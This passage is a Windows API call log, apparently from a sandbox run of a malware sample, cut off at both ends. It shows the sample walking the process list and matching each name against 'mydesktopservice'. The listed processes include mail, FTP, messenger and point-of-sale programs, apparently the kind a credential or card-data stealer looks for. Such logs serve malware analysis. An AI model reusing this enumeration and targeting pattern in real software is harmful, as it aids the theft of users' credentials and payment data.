0x3569ba8 [0094.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3569ba8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0094.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0094.230] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="mydesktopservice") returned 0x0 [0094.230] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0094.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.232] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569b48 [0094.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3569b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0094.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0094.232] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="mydesktopservice") returned 0x0 [0094.232] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0094.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.233] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35479e8 [0094.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35479e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0094.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0094.233] StrStrIA (lpFirst="icq.exe", lpSrch="mydesktopservice") returned 0x0 [0094.233] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0094.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.234] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356a020 [0094.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x356a020, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.234] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0094.234] StrStrIA (lpFirst="leechftp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.234] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0094.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.236] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356a110 [0094.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x356a110, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0094.236] StrStrIA (lpFirst="ncftp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.236] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0094.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.237] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a038 [0094.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x356a038, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0094.238] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0094.238] StrStrIA (lpFirst="notepad.exe", lpSrch="mydesktopservice") returned 0x0 [0094.238] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0094.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.239] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356ca10 [0094.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x356ca10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0094.239] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0094.239] StrStrIA (lpFirst="operamail.exe", lpSrch="mydesktopservice") returned 0x0 [0094.239] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0094.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.241] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c7d0 [0094.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x356c7d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0094.241] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0094.241] StrStrIA (lpFirst="outlook.exe", lpSrch="mydesktopservice") returned 0x0 [0094.241] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0094.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.242] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c8d8 [0094.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x356c8d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0094.242] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0094.242] StrStrIA (lpFirst="pidgin.exe", lpSrch="mydesktopservice") returned 0x0 [0094.242] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0094.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.243] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356c800 [0094.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x356c800, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0094.243] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0094.243] StrStrIA (lpFirst="scriptftp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.243] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0094.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.245] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356ca28 [0094.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x356ca28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0094.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0094.245] StrStrIA (lpFirst="skype.exe", lpSrch="mydesktopservice") returned 0x0 [0094.245] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0094.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.246] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c9f8 [0094.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x356c9f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.246] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0094.246] StrStrIA (lpFirst="smartftp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.246] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0094.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.247] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356c740 [0094.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x356c740, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0094.247] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0094.247] StrStrIA (lpFirst="thunderbird.exe", lpSrch="mydesktopservice") returned 0x0 [0094.247] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0094.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.249] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c9e0 [0094.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x356c9e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0094.249] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0094.249] StrStrIA (lpFirst="totalcmd.exe", lpSrch="mydesktopservice") returned 0x0 [0094.249] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0094.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.250] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c848 [0094.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x356c848, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0094.250] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0094.250] StrStrIA (lpFirst="trillian.exe", lpSrch="mydesktopservice") returned 0x0 [0094.250] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0094.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.251] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c9c8 [0094.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x356c9c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0094.251] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0094.251] StrStrIA (lpFirst="webdrive.exe", lpSrch="mydesktopservice") returned 0x0 [0094.252] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0094.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.266] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356c950 [0094.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x356c950, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.266] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0094.266] StrStrIA (lpFirst="whatsapp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.266] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0094.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.268] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c830 [0094.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x356c830, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0094.268] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0094.268] StrStrIA (lpFirst="winscp.exe", lpSrch="mydesktopservice") returned 0x0 [0094.268] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0094.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.269] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569aa8 [0094.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3569aa8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0094.269] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0094.269] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="mydesktopservice") returned 0x0 [0094.269] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0094.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.271] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3569ae8 [0094.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3569ae8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0094.271] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0094.271] StrStrIA (lpFirst="active-charge.exe", lpSrch="mydesktopservice") returned 0x0 [0094.271] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0094.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.272] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356c758 [0094.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x356c758, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0094.272] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0094.272] StrStrIA (lpFirst="accupos.exe", lpSrch="mydesktopservice") returned 0x0 [0094.272] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0094.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.273] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356c9b0 [0094.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x356c9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0094.273] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0094.273] StrStrIA (lpFirst="afr38.exe", lpSrch="mydesktopservice") returned 0x0 [0094.273] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0094.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.275] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356c920 [0094.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x356c920, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0094.275] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0094.275] StrStrIA (lpFirst="aldelo.exe", lpSrch="mydesktopservice") returned 0x0 [0094.275] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0094.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.276] 